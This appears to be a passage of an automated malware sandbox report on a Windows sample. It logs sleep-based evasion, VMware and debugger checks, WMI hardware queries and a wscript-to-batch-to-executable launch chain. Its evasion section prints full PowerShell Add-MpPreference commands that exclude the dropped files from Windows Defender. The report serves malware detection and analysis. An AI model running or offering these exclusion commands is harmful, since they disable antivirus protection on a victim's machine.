                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -584000s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -583846s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -583684s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -583573s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -583438s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -583282s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -583146s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -583015s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -582905s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -582797s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -582687s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -582578s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -582461s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -582348s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -582219s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -582091s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -581966s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -581859s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -581749s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -581641s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -581531s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -581422s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -581313s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -581203s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -581094s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -580969s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -580860s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -580735s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -580625s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -580516s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -580391s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -580272s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -580103s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -579997s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -579884s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -579779s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -579672s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -579563s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -579453s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -579324s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -579219s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -579094s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -578983s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -578874s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -578766s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -578641s >= -30000s
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe TID: 1852Thread sleep time: -578529s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe TID: 4600Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Recovery\uAsLgsGzSk.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\uAsLgsGzSk.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0090A69B
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0091C220
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091E6A3 VirtualQuery,GetSystemInfo,0_2_0091E6A3
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\uAsLgsGzSk.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\uAsLgsGzSk.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 30000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 600000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 599891
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 599766
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 3600000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 598903
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 598266
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 597516
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596985
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596782
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596625
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596422
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596266
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 596032
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 595844
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 595593
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 595369
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 595078
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 594891
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 594625
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 594360
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 594063
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 593860
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 593625
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 593328
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 593094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 592750
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 592547
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 592094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 591735
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 591504
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 591219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 590953
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 590641
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 590203
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 589953
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 589516
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 589000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 588782
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 588407
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 588059
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 587597
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 587235
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586925
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586752
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586547
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586384
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 300000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 586051
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585885
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585719
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585532
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585356
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585192
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 585047
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584875
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584688
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584485
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584321
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584150
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 584000
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583846
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583684
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583573
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583438
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583282
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583146
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 583015
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582905
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582797
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582687
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582578
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582461
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582348
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 582091
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581966
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581859
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581749
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581641
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581531
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581422
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581313
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581203
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 581094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580969
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580860
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580735
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580625
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580516
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580391
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580272
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 580103
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579997
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579884
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579779
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579672
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579563
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579453
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579324
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579219
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 579094
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578983
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578874
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578766
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578641
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeThread delayed: delay time: 578529
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: serverBrokerperfMonitor.exe, 00000005.00000002.1958938627.000000001CE34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yU
                                    Source: w32tm.exe, 00000026.00000002.1950605264.000001E1A95D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
                                    Source: wscript.exe, 00000001.00000003.1828389187.0000000000923000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: serverBrokerperfMonitor.exe, 00000005.00000002.1952160160.000000001BE59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: hz7DzW2Yop.exe, 00000000.00000003.1672432196.0000000000802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{v"
                                    Source: serverBrokerperfMonitor.exe, 00000005.00000002.1958938627.000000001CE34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: serverBrokerperfMonitor.exe, 00000005.00000002.1958938627.000000001CE34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}DD
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeAPI call chain: ExitProcess graph end nodegraph_0-23967
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0091F838
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_00927DEE mov eax, dword ptr fs:[00000030h]0_2_00927DEE
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0092C030 GetProcessHeap,0_2_0092C030
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\uAsLgsGzSk.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\uAsLgsGzSk.exeProcess token adjusted: Debug
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0091F838
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091F9D5 SetUnhandledExceptionFilter,0_2_0091F9D5
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0091FBCA
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_00928EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00928EBD
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\HyperWebbroker\serverBrokerperfMonitor.exe "C:\HyperWebbroker/serverBrokerperfMonitor.exe"Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe'Jump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'Jump to behavior
